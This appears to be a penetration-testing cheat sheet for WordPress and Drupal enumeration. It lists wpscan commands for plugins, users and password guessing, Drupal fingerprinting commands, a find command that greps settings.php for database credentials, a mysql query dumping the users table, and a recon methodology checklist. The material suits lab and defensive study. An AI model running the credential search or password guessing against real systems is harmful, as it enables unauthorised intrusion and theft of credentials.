wpscan --url "http://<TARGET_IP>" -e p → Enumerate installed plugins.
wpscan --url "http://<TARGET_IP>" -e vp → Enumerate vulnerable plugins.
wpscan --url "http://<TARGET_IP>" -e u → Enumerate users.
wpscan --url "http://<TARGET_IP>" --passwords path-to-wordlist → Attempt password testing.
curl https://www.drupal.org/ | grep 'content="Drupal' → Look for Drupal metadata.
curl drupal-site.com/node/1 → Access node-based pages.
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 "" → Try to identify Drupal version from changelog.
/user/register → Check whether username enumeration is possible via registration.
/user/<number> → Infer valid user IDs.
/node/<number> → Fuzz for hidden content.
droopescan scan drupal -u http://drupal-site.local → Enumerate a Drupal site automatically.
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null → Search for Drupal database credentials in settings.php.
mysql -u drupaluser --password='password' -e 'use drupal; select * from users' → Query Drupal users from the database when credentials are available.
- Confirm host availability
- Identify IPs, routes, and interfaces
- Collect passive intelligence
- Check DNS, subdomains, and web technologies
- Find live hosts
- Scan ports
- Detect service versions
- Save results to files
- SMB
- FTP
- SSH
- HTTP
- SQL
- SMTP
- Confirm misconfigurations
- Check weak credentials in lab environments
- Identify exposed files, shares, users, and services
- Enumerate users
- Enumerate services and scheduled tasks
- Enumerate routes, interfaces, and processes
- Look for credentials and interesting config files
- Save commands used
- Save findings
- Save screenshots
- Keep credentials and paths organized
- Enumeration is usually more important than exploitation.
- Save Nmap output early.
- Always check SMB, HTTP, FTP, and SQL if present.
- Do not get stuck on one service too early.
- Keep one clean workflow and reuse it.